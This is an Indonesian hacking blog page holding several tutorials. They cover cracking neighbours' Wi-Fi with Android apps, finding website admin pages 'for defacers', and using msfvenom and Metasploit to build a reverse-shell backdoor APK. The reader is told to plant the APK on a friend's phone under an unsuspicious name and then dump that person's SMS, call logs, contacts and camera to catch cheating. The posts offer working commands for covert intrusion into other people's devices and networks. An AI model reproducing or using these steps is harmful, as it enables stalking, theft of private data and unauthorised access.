Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Senin, 20 Februari 2017

Cracking WPA/WPA Wi-Fi With WPS WPA TESTER [ ANDROID ]


Assalamualaikum Wr.Wb


           Disini saya akan memberikan tutorial bagaimana cara kerja WPS WPA TESTER  , apa sih WPS WPA Tester ? . WPS WPA Tester adalah aplikasi yg dibuat untuk testing keja WPA dari router , awal pembuatan hanya untuk mengetes seberapa akurat testing dari aplikasi itu sendiri , namun lama kelamaan aplikasi ini masuk dalam kategori aplikasi untuk hacking ... kok bisa ? ya bisalah .. kan para black hat mengunakannya untuk "nyolong" wifi :v....kita mulai saja ya tutorialnya ...


Pertama kita buka dahulu WPS WPA TESTER nya


Lalu tampilan awalnya akan seperti ini , jika kosong anda dapat klik pada logo refresh ,lalu pilih salah satu wifi yg compatible dengan WPS ... warna yg compatible adalah hijau dan orange.


Lalu pilih salah satu methodnya yaitu connect automatic PIN atau custom pin atau manual pin selection ... Jika tidak mengerti anda dapat memilih angka angka WPS dibawah dan pilih salah satu


Lalu pilih metodenya ... NO ROOT atau ROOT 


Tunggu hingga proses selesai.


Jika sudah password akan terlihat , jika gagal anda dapat memilih salah satu pin dari banyak pin tadi...






Jadi itu saja yang dapat saya sampaikan , kurang lebihnya mohon maaf



Wassalamualaikum Wr.Wb

Brute Force Wi-Fi Dengan WIBR+


Assalamualaikum Wr.Wb

       Jadi Kali ini saya akan memberikan tutorial brute force dengan WIBR+ , ya aplikasi ini ada untuk android , anda dapat mendownload WIBR+ DI SINI Langsung kita mulai saja tutorialnya



1. OPEN WIBR+

     Buka terlebh dahulu WIBR+ nya ... LINK ADA DIATAS


2. FIND THE NETWORK

    Cari Wifinya di ADD NETWORK


3. CHOOSE THE NETWORK
   
    Pilih wifinya ... disini saya memakai SPACEX13


4. CHOOSE QUEUE METHOD

    Pilih apa yg akan anda gunakan .. jika anda bingung dengan bruteforce dan dictionary anda dapat membacanya DISINI


5. CHOOSE BRUTEFORCE CHARACTER

    Pilih karakter nya ... disini saya memilih lowercase dan numbers

keterangan : - Lowercase : huruf huruf kecil
                     - Uppercase : huruf kapital
                     - Numbers   : Angka
                     - Specials    : karakter spesial seperti ( !@#$%^&*_+":}|>?":';/,,.[\ )
Jika sudah .. save configuration  dan  add to queue


6. WAIT ..

    Jika sudah tunggu hingga proses brute force selesai


     Disini tertera sedang running atau bruteforce sedang berlangsung


7. DONE

   Jika sudah akan terkoneksi secara otomatis pada jaringan wifi




Jadi itu saja yang dapat saya sampaikan , kurang lebihnya mohon maaf



Wassalamualaikum Wr.Wb

Perbedaan Antara WIBR dan WIBR+ [ Wi-Fi Cracking ]


Assalamualaikum Wr.Wb

          Disini saya akan menjelaskan perbedaan antara WIBR dan WIBR+ , Apa sih WIBR itu ?
WIBR adalah aplikasi android yang dapat menjebol password wifi dengan cara cracking , Dictionary attack dan bruteforce. Ya.... jika WPS wifi tetangga tidak aktif atau tidak menyala saat anda membuka WPS WPA TESTER ... anda wajib memakai aplikasi ini gan.... langsung aja gan...


1. WIBR
     
 Anda dapat Mendownload WIBR Di SINI


    Ya.... WIBR yang bisa dibilang seri default atau seri yang belum lengkap ini anda dapat cracking password wifi dengan cara dictionary attack saja... atau crackinfg dengan dictionary atau wordlist yang sudah disediakan .. antara lain yaitu : Small Dictionary , Middle Dictionary dan Big Dictionary ... Ya ketiga Dictionary itu ada untung dan ruginya lohh...

- KERUGIAN

     - Small  Dictionary  : Anda hanya mempunyai 53 WordList saja ...
     - Middle Dictionary : Anda hanya mempunyai 45 Wordlist saja ... 
     - Big Dictionary        : Anda dapat 2029 Wordlist saja....

-KEUNTUNGAN

    - Anda dapat menghemat waktu bila password wifi ada di wordlist


2. WIBR+

Anda dapat mendownload WIBR+  Di SINI


     Ya.... WIBR+ yaitu seri WIBR yang ada keuntungan yg sangat menarik yaitu seri + ini anda bisa memanfaatkan BRUTE FORCE .... tetapi ada keuntungan dan kerugiannya juga loh

- KERUGIAN 

      - Memakan Waktu lama jika bruteforce , Cara kerja bruteforce adalah memasukkan password dari inisial " aaaaaaaa " lalu " aaaaaaab " dan seterusnya hingga " zzzzzzzz " dan setelah " zzzzzzzz " jika password wifinya ada pada inisial " p " akan lebih lama lagi.

- KEUNTUNGAN

     - Brute Force persentasi berhasil akan 100% 
     - Anda akan disediakan wordlist juga disini ...






Jadi itu saja yang dapat saya sampaikan , Kurang lebihnya mohon maaf




Wassalamualaikum Wr.Wb

Minggu, 19 Februari 2017

Mencari Admin Login Page pada website dengan kali linux


Assalamualaikum Wr.Wb

              Jadi disini saya akan menjelaskan tentang bagaimana mencari admin login page di kali linux , ini berguna sekali bagi pada defacer defacer yang tidak mau pusing mencari cari admin login page satu persatu.Dengan cara ini anda dapat mencari admin login page dengan mudah .

Bahan-Bahan :

   Note : Pilih Salah Satu Script Dibawah Ini !

  1. Admin_Finder.pl                      : Anda dapat mendownload di sini 
  2. Admin_Page_Finder_[perl].pl : Anda dapat mendownload di sini 


Langsung Mulai Saja :

1. Admin_Finder.pl

    Pertama buka script yang telah anda download dimana anda menyimpannya
   
   Lalu jalankan perl admin findernya
#perl admin_finder.pl


   Lalu masukkan link yang anda ingin lihat admin login pagenya


   Lalu pilih salah satu dari site sourcenya


   Jika sudah anda akan mendapatkan notifikasi bahwa admin login page sudah ditemukan seperti gambar dibawah



2. Admin_Page_Finder_[perl].pl

   Jalankan Admin page finder yg anda download untuk script kedua
#perl admin_page_finder_/[perl\].pl


   Lalu masukkan website yang anda inginkan


   Disini anda akan mendapatkan pilihan websitenya ... pilih php dan enter


   Jika sudah anda akan melihat bahwa admin login page sudah ditemukan , seperti gambar dibawah




Note : Gunakan Secara Bijak .

Jadi itu saja yang dapat saya sampaikan , kurang lebihnya mohon maaf .




Wassalamualaikum Wr.Wb

Rabu, 15 Februari 2017

Cara Exploit Android Dengan Metasploit [ Kali Linux ] [ LAN ] Part.1


Assalamualaikum Wr.Wb


                 Disini saya akan memberikan Tutorial cara exploit android dengan Metasploit di Kali Linux . Cara kerjanya adalah :

1. Membuat file .apk atau sebagai backdoor
2. Meneruskan Backdoor agar berjalan dengan Metasploit
3. Mengirim File dan Eksekusi File
4. Dump atau exploit

Bahan - bahan :

1. Kali Linux
2. Android ( Semua Versi )
3. Metasploit
4. WAIPAI /WI-FI yang bagustt ..... disini saya memakai wifi yang kenceng bener jadi tidak ada masalah sama sekali :v

LANGSUNG MULAI AJA GAUSAH BANYAK BCT !!

1. Membuat File APK

   Cek IP terlebih dahulu ... dan IP saya adalah 192.168.0.109 dan ingat ingat
#ifconfig



   Lalu buat file apk nya ...
#msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=444 R >tes.apk
   Keterangan :
         1. LHOST  : IP anda yang sudah anda cek tadi ( saya : 192.168.0.109 )
         2. LPORT  : Masukkan port ( Terserah berapa saja .. saya anjurkan 4444 )
         3. tes.apk   : ini adalah file backdoor anda ... anda dapat menamai apa saja , beri nama yg unik                                agar tidak curiga



    Cek pada file apk anda apakah ada atau tidak .. dan berikan pada teman anda atau install sendiri di smartphone teman anda
File berada pada /home



2. Jalankan Metasploit 

   Jalankan metasploit dengan perintah dibawah ini
#msfconsole 
untuk membuka metasploit
msf  > use exploit/multi/handler
msf exploit (handler) > set payload android/meterpreter/reverse_tcp
 msf exploit (handler) > set lhost 192.168.0.109
msf exploit (handler) > set lport 4444
msf exploit (handler) > exploit 



   Terminal akan berhenti pada starting the payload handler .... agar berjalan lagi anda harus menginstall file apk atau backdoor pada android anda atau teman anda....



3. Mengirim File & Eksekusi File

   Nama file yang tadi anda buat akan menjadi MainActivity sebagai defaultnya ,,, lalu anda install
   

    Setelah selesai install jangan langsung keluar dulu tetapi anda harus membuka file tersebut .. pilih open



4 . Metasploit

   Lalu terminal anda akan berjalan seperti dibawah ini .


   meterpreter > help
   Perintah diatas untuk melihat semua perintah yg bisa dilakukan metasploit


    Cek terlebih dahulu info device anda benar atau tidak
meterpreter > sysinfo


    Sekarang kita coba lihat SMS nya :v selingkuh atau tidak dia :v
meterpreter > dump_sms


   Setelah di dump anda akan melihat filenya di folder anda
/home


   Lalu kita buka dan....... TERNYATA ... SELINGKUH DENGAN OPERATOR AXOS :V gaboleh nyebut merk


Selebihnya anda kembangkan sendiri exploit anda dan anda dapat mencari perintah exploit di perintah help
meterpreter > help
Disitu akan banyak sekali perintah untuk dump :V beberapa contoh dibawah :
    
    - dump_callog ( untuk melihat log panggilan )
    - dump _contacts ( untuk melihat contact )
    - dump_snap ( untuk mengambil gambar dari kamera handphone )
    - dump_stream ( untuk memutar video secara live atau stream )

Sebenarnya masih ada cara lain yaitu menyisipkan file backdoor pada file apk , jadi apk file apa saja dapat dijalankan misalnya file instagram.apk dan sesudah diinstall dapat berjalan seperti biasa atau instagram biasa dan kita bisa mengakses HP victim tanpa ada curiga :v nanti di PART 2 ya.... 

Ada juga Exploit untuk beda jaringan ( Part 3 )
Jadi itu saja yang dapat saya sampaikan kurang lebihnya mohon maaf ...

Wassalamualaikum Wr.Wb